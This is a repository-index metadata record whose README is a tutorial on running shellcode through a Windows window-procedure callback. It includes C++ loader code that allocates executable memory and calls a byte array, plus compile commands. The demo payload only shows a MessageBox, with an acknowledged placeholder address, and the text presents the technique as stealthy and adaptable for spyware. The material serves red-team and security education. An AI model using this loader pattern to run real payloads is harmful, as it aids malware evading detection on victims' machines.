{"id":28537216,"url":"https://github.com/malforge-maldev-public-organization/shellcode-injection-using-window-callbacks","last_synced_at":"2025-09-03T13:41:41.922Z","repository":{"id":291764394,"uuid":"978704121","full_name":"Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","owner":"Malforge-Maldev-Public-Organization","description":"A minimal Windows GUI demo that allocates memory and executes 64-bit shellcode to display a MessageBox. Demonstrates basic shellcode injection using `VirtualAlloc`, `memcpy`, and function pointers in C.","archived":false,"fork":false,"pushed_at":"2025-05-08T11:36:48.000Z","size":20,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-08T06:52:33.848Z","etag":null,"topics":["callback","shellcode-injection","windows"],"latest_commit_sha":null,"homepage":"https://malforge-group.in/","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Malforge-Maldev-Public-Organization.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-06T11:44:17.000Z","updated_at":"2025-05-09T08:34:19.000Z","dependencies_parsed_at":"2025-05-06T12:54:53.702Z","dependency_job_id":"fc9e04ea-8682-43f5-8798-edd10cf1e0de","html_url":"https://github.com/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","commit_stats":null,"previous_names":["malforge-maldev-public-organization/shellcode-injection-using-window-callbacks"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Malforge-Maldev-Public-Organization","download_url":"https://codeload.github.com/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273453585,"owners_count":25108470,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-03T02:00:09.631Z","response_time":76,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["callback","shellcode-injection","windows"],"created_at":"2025-06-09T18:09:18.341Z","updated_at":"2025-09-03T13:41:41.904Z","avatar_url":"https://github.com/Malforge-Maldev-Public-Organization.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Shellcode Injection via Window Callbacks\n\nShellcode injection is a potent technique in security research and exploit development, enabling the execution of arbitrary machine code within a target process. This post focuses on **shellcode injection via window callbacks**, a method that leverages the Windows messaging system to execute shellcode through the `WndProc` function.\n\n---\n\n## Introduction to Shellcode Injection\n\n**Shellcode** is a small, position-independent sequence of machine instructions that performs specific tasks such as spawning shells, displaying messages, or establishing connections. It is a fundamental element in many exploits.\n\nShellcode injection typically involves:\n\n1. Injecting shellcode into the memory of a process.\n2. Redirecting code execution to the shellcode’s location.\n\nCommon techniques include thread injection, function pointer manipulation, and callback exploitation. This article focuses on **window callbacks**, a technique rooted in the Windows GUI subsystem.\n\n---\n\n## Understanding Window Callbacks\n\n### What is a Callback?\n\nA **callback** is a function registered to handle specific events or actions. In Windows programming, callbacks manage GUI events, such as mouse clicks or key presses.\n\n### Window Procedure (`WndProc`)\n\nThe `WndProc` is a user-defined function for handling messages sent to a window:\n\n```cpp\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);\n```\n\nParameters:\n- `hwnd`: Handle to the window.\n- `msg`: Message identifier.\n- `wParam`, `lParam`: Additional message information.\n\n### Windows Messaging System\n\nWindows uses a **message queue** for GUI threads, which is processed in a loop using `GetMessage` and `DispatchMessage`. The system calls `WndProc` when dispatching messages, making it a suitable target for injection.\n\n---\n\n## Shellcode Injection via Window Callbacks\n\n### Concept\n\nThis technique involves:\n1. Creating a window with a custom `WndProc`.\n2. Allocating executable memory for shellcode.\n3. Copying the shellcode into memory.\n4. Modifying `WndProc` to run shellcode on a specific message.\n5. Triggering the message to execute the code.\n\n### Why Use Window Callbacks?\n\n- **Reliability**: The OS ensures `WndProc` is invoked for relevant messages.\n- **Legitimacy**: GUI callbacks are typical and less suspicious.\n- **Simplicity**: Easy to implement and control.\n\n---\n\n## Proof-of-Concept (POC) Code\n\nThis C++ code uses a basic 64-bit shellcode that shows a MessageBox. It includes memory allocation, execution, and cleanup.\n\n```cpp\n#include \u003cwindows.h\u003e\n\n// Simple shellcode to display a MessageBox (64-bit)\nunsigned char shellcode[] = {\n    0x48, 0x83, 0xEC, 0x28,\n    0x48, 0x31, 0xC9,\n    0x48, 0x8D, 0x15, 0x1E, 0x00, 0x00, 0x00,\n    0x4C, 0x8D, 0x05, 0x1F, 0x00, 0x00, 0x00,\n    0x48, 0x31, 0xC9,\n    0x48, 0xB8, /* MessageBoxA address placeholder */ 0,0,0,0,0,0,0,0,\n    0xFF, 0xD0,\n    0x48, 0x83, 0xC4, 0x28,\n    0xC3,\n    'H','e','l','l','o',' ','W','o','r','l','d',0,\n    'T','e','s','t',0\n};\n\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {\n    static LPVOID shellcodeAddr = NULL;\n    if (msg == WM_USER + 100) {\n        shellcodeAddr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n        if (!shellcodeAddr) {\n            MessageBoxW(hwnd, L\"Failed to allocate memory\", L\"Error\", MB_OK | MB_ICONERROR);\n            return 0;\n        }\n        memcpy(shellcodeAddr, shellcode, sizeof(shellcode));\n        ((void(*)())shellcodeAddr)();\n        VirtualFree(shellcodeAddr, 0, MEM_RELEASE);\n        shellcodeAddr = NULL;\n        return 0;\n    }\n    if (msg == WM_DESTROY) {\n        PostQuitMessage(0);\n        return 0;\n    }\n    return DefWindowProcW(hwnd, msg, wParam, lParam);\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\n    WNDCLASSW wc = { 0 };\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = L\"InjectWindow\";\n\n    if (!RegisterClassW(\u0026wc)) {\n        MessageBoxW(NULL, L\"Failed to register window class\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    HWND hwnd = CreateWindowExW(0, L\"InjectWindow\", L\"Shellcode Demo\", WS_OVERLAPPEDWINDOW,\n        CW_USEDEFAULT, CW_USEDEFAULT, 400, 300, NULL, NULL, hInstance, NULL);\n\n    if (!hwnd) {\n        MessageBoxW(NULL, L\"Failed to create window\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    ShowWindow(hwnd, nCmdShow);\n    UpdateWindow(hwnd);\n\n    SendMessageW(hwnd, WM_USER + 100, 0, 0);\n\n    MSG msg = { 0 };\n    while (GetMessageW(\u0026msg, NULL, 0, 0)) {\n        TranslateMessage(\u0026msg);\n        DispatchMessageW(\u0026msg);\n    }\n\n    return (int)msg.wParam;\n}\n```\n\n---\n\n## Compiling Shellcode on Kali Linux\n\nTo compile the above code for Windows on Kali Linux:\n\n### Prerequisites\n\n```bash\nsudo apt update\nsudo apt install mingw-w64\n```\n\n### Compilation\n\n```bash\nx86_64-w64-mingw32-g++ -static -static-libgcc -static-libstdc++ -DUNICODE -D_UNICODE -mwindows shellcode_injection.cpp -o shellcode_injection.exe\n```\n\nExplanation:\n- `-static`: Statically links libraries.\n- `-DUNICODE`: Enables Unicode support.\n- `-mwindows`: GUI subsystem (no console).\n- `shellcode_injection.cpp`: Your source file.\n\nTransfer the `.exe` to a 64-bit Windows environment and execute.\n\n\u003e Note : Ensure the shellcode is 64-bit (as provided) for compatibility.\n\u003e Test in a Windows VM, as Kali cannot run the .exe natively.\n\u003e Use -g for debugging symbols if needed: -g -fdiagnostics-color=always.\n\n---\n\n## POC(Test in VS Code)\n![image](https://github.com/user-attachments/assets/87adf252-6d12-4c16-89e4-dc3cb761faaa)\n\n## Code Explanation\n\n### Header and Shellcode\n\n```cpp\n#include \u003cwindows.h\u003e\n\n// Simple shellcode to display a MessageBox (64-bit)\nunsigned char shellcode[] = { ... };\n```\n`\u003cwindows.h\u003e`: Provides Windows API functions for windows, messaging, and memory.  \n**Shellcode**: A simplified 64-bit payload to call `MessageBoxA(\"Hello World\", \"Test\", 0, 0)`. It:\n- Sets up the stack and parameters.\n- Calls `MessageBoxA` (placeholder address).\n- Includes strings `\"Hello World\\0\"` and `\"Test\\0\"`.\n\n\u003e Note: The `MessageBoxA` address is a placeholder; a real implementation would resolve it dynamically.\n\n### Window Procedure (`WndProc`)\n\n```cpp\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {\n    static LPVOID shellcodeAddr = NULL;\n    if (msg == WM_USER + 100) {\n        shellcodeAddr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n        if (!shellcodeAddr) {\n            MessageBoxW(hwnd, L\"Failed to allocate memory\", L\"Error\", MB_OK | MB_ICONERROR);\n            return 0;\n        }\n        memcpy(shellcodeAddr, shellcode, sizeof(shellcode));\n        ((void(*)())shellcodeAddr)();\n        VirtualFree(shellcodeAddr, 0, MEM_RELEASE);\n        shellcodeAddr = NULL;\n        return 0;\n    }\n    if (msg == WM_DESTROY) {\n        PostQuitMessage(0);\n        return 0;\n    }\n    return DefWindowProcW(hwnd, msg, wParam, lParam);\n}\n```\n\n**Purpose**: Processes messages and executes the shellcode.\n\n#### Key Elements:\n\n- `static LPVOID shellcodeAddr = NULL`: Tracks allocated memory.\n- `if (msg == WM_USER + 100)`: Executes shellcode for the custom message.\n- `VirtualAlloc`: Allocates executable memory.\n- `memcpy`: Copies the shellcode.\n- `((void(*)())shellcodeAddr)()`: Runs the shellcode.\n- `VirtualFree`: Frees memory to prevent leaks.\n- `WM_DESTROY`: Handles window closure, posting `WM_QUIT`.\n- `DefWindowProcW`: Processes unhandled messages.\n\n### Main Function\n\n```cpp\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\n    // Register window class\n    WNDCLASSW wc = { 0 };\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = L\"InjectWindow\";\n    if (!RegisterClassW(\u0026wc)) {\n        MessageBoxW(NULL, L\"Failed to register window class\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    // Create window\n    HWND hwnd = CreateWindowExW(0, L\"InjectWindow\", L\"Shellcode Demo\", WS_OVERLAPPEDWINDOW,\n                               CW_USEDEFAULT, CW_USEDEFAULT, 400, 300,\n                               NULL, NULL, hInstance, NULL);\n    if (!hwnd) {\n        MessageBoxW(NULL, L\"Failed to create window\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    // Show window\n    ShowWindow(hwnd, nCmdShow);\n    UpdateWindow(hwnd);\n\n    // Trigger shellcode\n    SendMessageW(hwnd, WM_USER + 100, 0, 0);\n\n    // Message loop\n    MSG msg = { 0 };\n    while (GetMessageW(\u0026msg, NULL, 0, 0)) {\n        TranslateMessage(\u0026msg);\n        DispatchMessageW(\u0026msg);\n    }\n\n    return (int)msg.wParam;\n}\n```\n\n**WinMain**: Uses the GUI entry point for compatibility with `-mwindows`.\n\n#### Window Setup:\n\n- Registers a window class (`InjectWindow`) with `WndProc`.\n- Creates a 400x300 window titled “Shellcode Demo”.\n\n**Display**: Shows and paints the window.  \n**Shellcode Trigger**: Sends `WM_USER + 100` to execute the shellcode.  \n**Message Loop**: Keeps the window responsive.  \n**Return**: Exits with the message loop’s result.\n\n## How It Works\n\n1. **Initialization**: Registers a window class and creates a window.\n2. **Display**: Shows a window titled “Shellcode Demo”.\n3. **Trigger**: Sends a message (`WM_USER + 100`) to execute shellcode.\n4. **Execution**:\n   - Allocates executable memory.\n   - Copies shellcode.\n   - Executes it.\n   - Frees the memory.\n5. **Loop**: Processes messages.\n6. **Output**: MessageBox with \"Hello World\" and title \"Test\".\n\n---\n\n## Security Implications\n\n### Malicious Use\n\n- **Malware**: Can be adapted to run spyware or other payloads.\n- **Exploitation**: Effective in GUI-based processes.\n- **Red Teaming**: Demonstrates post-exploitation techniques.\n\n### Why Effective?\n\n- **Stealthy**: Mimics GUI message handling.\n- **Controlled**: Triggered by specific messages.\n- **Simple**: Requires minimal code.\n\n---\n\n## Conclusion\n\nShellcode injection via window callbacks is a reliable and stealthy method for arbitrary code execution in Windows environments. The POC offers a practical introduction to shellcode behavior, memory management, and Windows internals. Always use responsibly in controlled labs or for red teaming.\n\nThank you for reading!\n\n— **Malforge Group**\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks/lists"}